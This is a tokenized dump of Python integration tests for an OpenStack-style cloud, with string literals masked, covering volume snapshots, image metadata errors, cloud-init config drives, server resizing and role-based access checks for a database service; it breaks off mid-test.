list_all_snapshots_info ( ) <EOL> self . assertResponseDeserializedAndOk ( <EOL> resp , '<STR_LIT>' . format ( <EOL> volume . id_ ) ) <EOL> snapshot_list = resp . entity <EOL> self . assertIn ( snapshot . name , [ s . name for s in snapshot_list ] ) <EOL> self . assertIn ( snapshot . id_ , [ s . id_ for s in snapshot_list ] ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_get_snapshot_info ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( volume . id_ ) <EOL> resp = self . volumes . client . get_snapshot_info ( snapshot . id_ ) <EOL> self . assertResponseDeserializedAndOk ( <EOL> resp , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( snapshot . id_ , volume . id_ ) ) <EOL> snapshot_info = resp . entity <EOL> self . assertEqual ( snapshot . name , snapshot_info . name ) <EOL> self . assertEqual ( snapshot . id_ , snapshot_info . id_ ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . compute . common . exceptions import ItemNotFound <EOL> from cloudroast . compute . fixtures import ComputeFixture <EOL> class ImagesMetadataNegativeTest ( ComputeFixture ) : <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_list_image_metadata_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . list_image_metadata ( <NUM_LIT> ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_get_image_metadata_item_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . get_image_metadata_item ( <NUM_LIT> , '<STR_LIT>' ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_set_image_metadata_item_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . set_image_metadata_item ( <NUM_LIT> , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_delete_image_metadata_item_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . delete_image_metadata_item ( <NUM_LIT> , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudroast . compute . fixtures import ComputeFixture <EOL> class CloudInitConfigTest ( ComputeFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( CloudInitConfigTest , cls ) . setUpClass ( ) <EOL> init_st = cls . config_drive_behaviors . read_cloud_init_for_config_drive ( <EOL> cls . cloud_init_config . cloud_config_format_script ) <EOL> cls . user_data_contents = init_st <EOL> user_data = base64 . b64encode ( cls . user_data_contents ) <EOL> cls . key = cls . keypairs_client . create_keypair ( rand_name ( "<STR_LIT:key>" ) ) . entity <EOL> cls . resources . add ( cls . key . name , <EOL> cls . keypairs_client . delete_keypair ) <EOL> cls . server_response = cls . server_behaviors . create_active_server ( <EOL> config_drive = True , <EOL> key_name = cls . key . name , <EOL> user_data = user_data ) <EOL> cls . server = cls . server_response . entity <EOL> cls . user_data_filepath = '<STR_LIT>' . format ( <EOL> cls . config_drive_config . base_path_to_mount ) <EOL> cls . resources . add ( cls . server . id , <EOL> cls . servers_client . delete_server ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT:yes>' ) <EOL> def test_cloud_config_input_format ( self ) : <EOL> """<STR_LIT>""" <EOL> message = "<STR_LIT>" <EOL> self . config_drive_behaviors . mount_config_drive ( <EOL> server = self . server , servers_config = self . servers_config , <EOL> key = self . key . private_key , <EOL> source_path = self . config_drive_config . mount_source_path , <EOL> destination_path = self . config_drive_config . base_path_to_mount ) <EOL> remote_client = self . server_behaviors . get_remote_instance_client ( <EOL> self . server , self . servers_config , key = self . key . private_key ) <EOL> instanse_user_data = remote_client . get_file_details ( <EOL> self . 
user_data_filepath ) <EOL> self . assertEqual ( instanse_user_data . content , <EOL> self . user_data_contents , <EOL> msg = message . format ( '<STR_LIT>' , <EOL> instanse_user_data . content , <EOL> self . user_data_contents ) ) <EOL> dir_cloud_config_present = self . config_drive_behaviors . status_of_manage_etc_hosts ( server = self . server , <EOL> servers_config = self . servers_config , <EOL> key = self . key . private_key ) <EOL> self . assertTrue ( dir_cloud_config_present , <EOL> msg = "<STR_LIT>" ) <EOL> hosts = remote_client . get_file_details ( '<STR_LIT>' ) . content <EOL> self . assertIn ( '<STR_LIT>' , hosts , msg = "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudcafe . compute . common . types import ComputeHypervisors , NovaServerStatusTypes <EOL> from cloudcafe . compute . config import ComputeConfig <EOL> from cloudcafe . compute . flavors_api . config import FlavorsConfig <EOL> from cloudroast . compute . fixtures import ServerFromImageFixture <EOL> compute_config = ComputeConfig ( ) <EOL> hypervisor = compute_config . hypervisor . lower ( ) <EOL> flavors_config = FlavorsConfig ( ) <EOL> resize_up_enabled = ( flavors_config . resize_up_enabled <EOL> if flavors_config . resize_up_enabled is not None <EOL> else flavors_config . resize_enabled ) <EOL> can_resize = ( <EOL> resize_up_enabled <EOL> and hypervisor not in [ ComputeHypervisors . IRONIC , <EOL> ComputeHypervisors . LXC_LIBVIRT ] ) <EOL> class ResizeServerDataIntegrityTests ( object ) : <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT:yes>' ) <EOL> def test_active_file_inject_during_resize ( self ) : <EOL> """<STR_LIT>""" <EOL> server_to_resize = self . server <EOL> self . resize_resp = self . servers_client . resize ( <EOL> server_to_resize . id , self . flavor_ref_alt ) <EOL> self . server_behaviors . wait_for_server_task_state ( <EOL> self . server . id , '<STR_LIT>' , <EOL> self . servers_config . server_build_timeout ) <EOL> remote_client = self . server_behaviors . get_remote_instance_client ( <EOL> self . server , self . servers_config , key = self . key . private_key ) <EOL> prototype_file = remote_client . create_file ( <EOL> file_name = '<STR_LIT>' , <EOL> file_content = "<STR_LIT:content>" , <EOL> file_path = self . servers_config . default_file_path ) . content <EOL> self . server_behaviors . wait_for_server_status ( <EOL> server_to_resize . id , NovaServerStatusTypes . VERIFY_RESIZE ) <EOL> self . confirm_resize_resp = self . servers_client . 
confirm_resize ( <EOL> server_to_resize . id ) <EOL> self . server_behaviors . wait_for_server_status ( <EOL> server_to_resize . id , NovaServerStatusTypes . ACTIVE ) <EOL> remote_client = self . server_behaviors . get_remote_instance_client ( <EOL> self . server , self . servers_config , key = self . key . private_key ) <EOL> file = remote_client . get_file_details ( <EOL> file_path = '<STR_LIT>' . format ( <EOL> self . servers_config . default_file_path ) ) . content <EOL> self . assertEqual ( prototype_file , file , <EOL> msg = "<STR_LIT>" ) <EOL> @ unittest . skipUnless ( <EOL> can_resize , '<STR_LIT>' ) <EOL> class ServerFromImageResizeServerUpConfirmTests ( ServerFromImageFixture , <EOL> ResizeServerDataIntegrityTests ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( ServerFromImageResizeServerUpConfirmTests , cls ) . setUpClass ( ) <EOL> cls . key = cls . keypairs_client . create_keypair ( rand_name ( "<STR_LIT:key>" ) ) . entity <EOL> cls . resources . add ( cls . key . name , <EOL> cls . keypairs_client . delete_keypair ) <EOL> cls . create_server ( key_name = cls . key . name ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from cloudcafe . compute . common . types import ComputeHypervisors <EOL> from cloudcafe . compute . config import ComputeConfig <EOL> from cloudcafe . compute . flavors_api . config import FlavorsConfig <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudroast . compute . instance_actions . api . test_resize_server_confirm import ResizeServerUpConfirmTests , ResizeUpConfirmBaseFixture <EOL> from cloudroast . compute . fixtures import ServerFromVolumeV1Fixture <EOL> compute_config = ComputeConfig ( ) <EOL> hypervisor = compute_config . hypervisor . lower ( ) <EOL> flavors_config = FlavorsConfig ( ) <EOL> resize_up_enabled = ( flavors_config . resize_up_enabled <EOL> if flavors_config . resize_up_enabled is not None <EOL> else flavors_config . resize_enabled ) <EOL> can_resize = ( <EOL> resize_up_enabled <EOL> and hypervisor not in [ ComputeHypervisors . IRONIC , <EOL> ComputeHypervisors . LXC_LIBVIRT ] ) <EOL> @ unittest . skipUnless ( <EOL> can_resize , '<STR_LIT>' ) <EOL> class ServerFromVolumeV1ResizeUpConfirmTests ( ServerFromVolumeV1Fixture , <EOL> ResizeServerUpConfirmTests , <EOL> ResizeUpConfirmBaseFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( ServerFromVolumeV1ResizeUpConfirmTests , cls ) . setUpClass ( ) <EOL> cls . key = cls . keypairs_client . create_keypair ( rand_name ( "<STR_LIT:key>" ) ) . entity <EOL> cls . resources . add ( cls . key . name , <EOL> cls . keypairs_client . delete_keypair ) <EOL> cls . create_server ( key_name = cls . key . name ) <EOL> cls . resize_up_and_confirm ( ) <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> def test_resized_server_disk_size ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from test_repo . database . fixtures import DBaaSFixture <EOL> class RBACTest ( DBaaSFixture ) : <EOL> dbaas_admin = None <EOL> dbaas_creator = None <EOL> dbaas_observer = None <EOL> admin_instance_id = None <EOL> creator_instance_id = None <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( RBACTest , cls ) . setUpClass ( ) <EOL> cls . dbaas_admin = cls . admin_client . reddwarfclient <EOL> cls . dbaas_admin . authenticate ( ) <EOL> resp , body = RBACTest . dbaas_admin . client . last_response <EOL> j = json . loads ( body ) <EOL> role = j [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> assert ( role == DBaaSFixture . Role . admin ) <EOL> cls . dbaas_creator = cls . creator_client . reddwarfclient <EOL> cls . dbaas_creator . authenticate ( ) <EOL> resp , body = cls . dbaas_creator . client . last_response <EOL> j = json . loads ( body ) <EOL> roles = j [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] [ '<STR_LIT>' ] <EOL> role_found = False <EOL> for role in roles : <EOL> role_name = role [ '<STR_LIT:name>' ] <EOL> if role_name == DBaaSFixture . Role . creator : <EOL> role_found = True <EOL> assert role_found <EOL> cls . dbaas_observer = cls . observer_client . reddwarfclient <EOL> cls . dbaas_observer . authenticate ( ) <EOL> resp , body = cls . dbaas_observer . client . last_response <EOL> j = json . loads ( body ) <EOL> roles = j [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] [ '<STR_LIT>' ] <EOL> role_found = False <EOL> for role in roles : <EOL> role_name = role [ '<STR_LIT:name>' ] <EOL> if role_name == DBaaSFixture . Role . observer : <EOL> role_found = True <EOL> assert role_found <EOL> try : <EOL> cls . admin_instance_id , time = cls . behavior . create_active_instance ( cls . dbaas_admin ) <EOL> except BaseException as be : <EOL> assert be is None <EOL> try : <EOL> cls . creator_instance_id , time = cls . behavior . create_active_instance ( cls . 
dbaas_creator ) <EOL> except BaseException as be : <EOL> assert be is None <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> status = cls . behavior . get_instance_status ( cls . dbaas_creator , <EOL> cls . creator_instance_id ) <EOL> if cls . behavior . is_instance_active ( cls . dbaas_creator , <EOL> instanceStatus = status ) : <EOL> cls . dbaas_admin . instances . get ( cls . creator_instance_id ) . delete ( ) <EOL> status = cls . behavior . get_instance_status ( cls . dbaas_admin , <EOL> cls . admin_instance_id ) <EOL> if cls . behavior . is_instance_active ( cls . dbaas_admin , <EOL> instanceStatus = status ) : <EOL> cls . dbaas_admin . instances . get ( cls . admin_instance_id ) . delete ( ) <EOL> def test_rbac_database_admin_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> try : <EOL> self . dbaas_admin . databases . create ( self . admin_instance_id , db_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_admin . databases . list ( <EOL> self . dbaas_creator . instances . get ( self . admin_instance_id ) ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_admin . databases . delete ( self . admin_instance_id , db_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . 
fail ( e ) <EOL> def test_rbac_users_admin_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> user_name = "<STR_LIT>" <EOL> user_body = [ { "<STR_LIT>" : db_body , <EOL> "<STR_LIT:name>" : user_name , <EOL> "<STR_LIT:password>" : "<STR_LIT:password>" } ] <EOL> try : <EOL> self . dbaas_admin . users . create ( self . admin_instance_id , user_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . list ( <EOL> self . dbaas_admin . instances . get ( self . admin_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . delete ( self . admin_instance_id , db_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . list_access ( self . admin_instance_id , <EOL> user_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . revoke ( self . admin_instance_id , user_name , <EOL> db_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> _db_list = [ db_name ] <EOL> self . dbaas_admin . users . grant ( self . admin_instance_id , user_name , <EOL> _db_list ) <EOL> httpCode = self . 
behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> user_body [ <NUM_LIT:0> ] [ '<STR_LIT:password>' ] = "<STR_LIT>" <EOL> self . dbaas_admin . users . change_passwords ( self . admin_instance_id , <EOL> user_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_flavors_admin_rights ( self ) : <EOL> expectedFlavorRamName = { <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" } <EOL> try : <EOL> flavorList = self . dbaas_admin . flavors . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> actualFlavorRamName = { } <EOL> self . assertIsNotNone ( flavorList , "<STR_LIT>" ) <EOL> for flavor in flavorList : <EOL> self . assertIsNotNone ( flavor . id , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . links , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . name , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . ram , "<STR_LIT>" ) <EOL> actualFlavorRamName [ flavor . ram ] = str ( flavor . name ) <EOL> self . assertEqual ( expectedFlavorRamName , <EOL> actualFlavorRamName , <EOL> "<STR_LIT>" <EOL> % ( expectedFlavorRamName , actualFlavorRamName ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_instance_admin_rights ( self ) : <EOL> next_flavor = <NUM_LIT:1> <EOL> final_flavor = <NUM_LIT:2> <EOL> resize_vol = <NUM_LIT:5> <EOL> try : <EOL> instancesList = self . 
dbaas_admin . instances . list ( ) <EOL> self . assertIsNotNone ( instancesList ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> current_instance = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) <EOL> self . assertIsNotNone ( current_instance ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> user_name , user_password = self . dbaas_admin . root . create ( <EOL> self . admin_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . assertEqual ( user_name , '<STR_LIT:root>' , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( user_password , "<STR_LIT>" ) <EOL> self . assertTrue ( <EOL> self . dbaas_admin . root . is_root_enabled ( self . admin_instance_id ) , <EOL> "<STR_LIT>" ) <EOL> self . dbaas_admin . instances . resize_instance ( self . admin_instance_id , <EOL> next_flavor ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> flavorId = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) . flavor [ "<STR_LIT:id>" ] <EOL> self . 
assertEqual ( str ( next_flavor ) , flavorId , <EOL> "<STR_LIT>" <EOL> % ( next_flavor , flavorId ) ) <EOL> self . dbaas_admin . instances . resize_instance ( self . admin_instance_id , <EOL> final_flavor ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> flavorId = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) . flavor [ "<STR_LIT:id>" ] <EOL> self . assertEqual ( str ( final_flavor ) , flavorId , <EOL> "<STR_LIT>" <EOL> % ( final_flavor , flavorId ) ) <EOL> self . dbaas_admin . instances . restart ( self . admin_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> self . dbaas_admin . instances . resize_volume ( self . admin_instance_id , <EOL> resize_vol ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> volume_size = self . dbaas_admin . 
instances . get ( <EOL> self . admin_instance_id ) . volume [ "<STR_LIT:size>" ] <EOL> self . assertEqual ( resize_vol , volume_size , <EOL> "<STR_LIT>" <EOL> % ( resize_vol , volume_size ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_database_creator_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> try : <EOL> self . dbaas_creator . databases . create ( self . creator_instance_id , <EOL> db_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . databases . list ( self . dbaas_creator . instances . get ( <EOL> self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . databases . delete ( self . creator_instance_id , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_users_creator_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> user_name = "<STR_LIT>" <EOL> user_body = [ { "<STR_LIT>" : db_body , "<STR_LIT:name>" : user_name , <EOL> "<STR_LIT:password>" : "<STR_LIT:password>" } ] <EOL> try : <EOL> self . dbaas_creator . users . create ( self . creator_instance_id , <EOL> user_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . 
dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . users . list ( <EOL> self . dbaas_creator . instances . get ( self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . users . delete ( self . creator_instance_id , db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . users . list_access ( self . creator_instance_id , <EOL> user_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . users . revoke ( self . creator_instance_id , <EOL> user_name , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> _db_list = [ db_name ] <EOL> self . dbaas_creator . users . grant ( self . creator_instance_id , <EOL> user_name , <EOL> _db_list ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . 
assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> user_body [ <NUM_LIT:0> ] [ '<STR_LIT:password>' ] = "<STR_LIT>" <EOL> self . dbaas_creator . users . change_passwords ( self . creator_instance_id , <EOL> user_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_flavors_creator_rights ( self ) : <EOL> expectedFlavorRamName = { <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" } <EOL> try : <EOL> flavorList = self . dbaas_creator . flavors . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> actualFlavorRamName = { } <EOL> self . assertIsNotNone ( flavorList , "<STR_LIT>" ) <EOL> for flavor in flavorList : <EOL> self . assertIsNotNone ( flavor . id , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . links , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . name , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . ram , "<STR_LIT>" ) <EOL> actualFlavorRamName [ flavor . ram ] = str ( flavor . name ) <EOL> self . assertEqual ( expectedFlavorRamName , <EOL> actualFlavorRamName , <EOL> "<STR_LIT>" <EOL> % ( expectedFlavorRamName , actualFlavorRamName ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_instance_creator_rights ( self ) : <EOL> next_flavor = <NUM_LIT:1> <EOL> resize_vol = <NUM_LIT:5> <EOL> try : <EOL> instancesList = self . dbaas_creator . instances . list ( ) <EOL> self . 
assertIsNotNone ( instancesList ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> current_instance = self . dbaas_creator . instances . get ( <EOL> self . creator_instance_id ) <EOL> self . assertIsNotNone ( current_instance ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . root . create ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , 